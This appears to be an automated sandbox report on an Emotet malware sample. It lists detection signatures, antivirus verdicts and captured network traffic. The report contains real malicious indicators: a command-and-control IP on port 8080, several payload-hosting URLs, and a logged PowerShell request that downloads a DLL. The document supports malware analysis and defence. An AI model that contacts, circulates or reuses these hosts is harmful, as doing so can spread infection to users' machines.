Windows Analysis Report

Overview

General Information

Analysis ID: 631940

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Changes security center settings (notifications, updates, antivirus, firewall)
Suspicious powershell command line found
Suspicious command line found
Powershell drops PE file
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: https://173.82.82.196:8080/temV Avira URL Cloud: Label: malware
Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/ Avira URL Cloud: Label: malware
Source: https://173.82.82.196:8080/l Avira URL Cloud: Label: malware
Source: http://digitalkitchen.jp/images/PVn/ Avira URL Cloud: Label: malware
Source: https://173.82.82.196/ URL Reputation: Label: malware
Source: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ Avira URL Cloud: Label: malware
Source: https://173.82.82.196:8080/ URL Reputation: Label: malware
Source: http://piffl.com/piffl.com/a/ Avira URL Cloud: Label: malware
Source: https://nakharinitwebhosting.com/HSDYKN1X5GLF/ Avira URL Cloud: Label: malware
Source: https://173.82.82.196:8080/P Avira URL Cloud: Label: malware
Source: jsonsintl.com Virustotal: Detection: 5%
Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/ Virustotal: Detection: 14%
Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP ReversingLabs: Detection: 40%
Source: C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy) ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP Joe Sandbox ML: detected
Source: C:\Windows\System32\regsvr32.exe Code function: 17_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose, 17_2_00000001800248B0

Networking

Source: C:\Windows\System32\regsvr32.exe Network Connect: 173.82.82.196 8080
Source: Joe Sandbox View ASN Name: MULTA-ASN1US
Source: Joe Sandbox View ASN Name: DIMENOCUS
Source: Joe Sandbox View IP Address: 173.82.82.196
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 02:12:15 GMTServer: ApacheX-Powered-By: PHP/5.6.40Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 02:12:15 GMTContent-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"Content-Transfer-Encoding: binarySet-Cookie: 628aed7f4404a=1653271935; expires=Mon, 23-May-2022 02:13:15 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 02:12:15 GMTContent-Length: 365056Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=40Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhk
Source: global traffic HTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive
Source: global traffic TCP traffic: 192.168.2.3:49752 -> 173.82.82.196:8080
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","P equals www.facebook.com (Facebook)
Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","P equals www.twitter.com (Twitter)
Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","
ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cmentarz.5v.pl/themes/zalMkTb/
Source: regsvr32.exe, 00000011.00000003.390757486.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504419422.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.506488059.0000025912489000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436767944.0000019AC6500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.505950785.0000021041500000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000013.00000002.506283732.000002591240E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436767944.0000019AC6500000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: regsvr32.exe, 00000011.00000003.391691578.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504289621.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000011.00000003.390757486.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382340670.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.505425880.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504419422.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382007388.0000000002C91000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382164868.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.17.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://digitalkitchen.jp/images/PVn/
Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://help.disneyplus.com.
Source: powershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jsonsintl.com
Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/
Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://piffl.com/piffl.com/a/
Source: powershell.exe, 00000002.00000002.320009117.0000000004E31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: powershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jsonsintl.com
Source: powershell.exe, 00000002.00000002.320849477.00000000051F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jsonsintl.com/
Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
Source: powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jsonsintl.com4
Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://173.82.82.196/
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://173.82.82.196:8080/
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://173.82.82.196:8080/P
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://173.82.82.196:8080/l
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://173.82.82.196:8080/temV
Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000008.00000002.504401163.000001EB54229000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000008.00000002.504401163.000001EB54229000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000A.00000002.319452146.000001C28006A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317899105.000001C280068000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000003.299865395.00000000058F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nakharinitwebhosting.com/HSDYKN1X5GLF/
Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318500901.000001C280045000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318593022.000001C28003A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
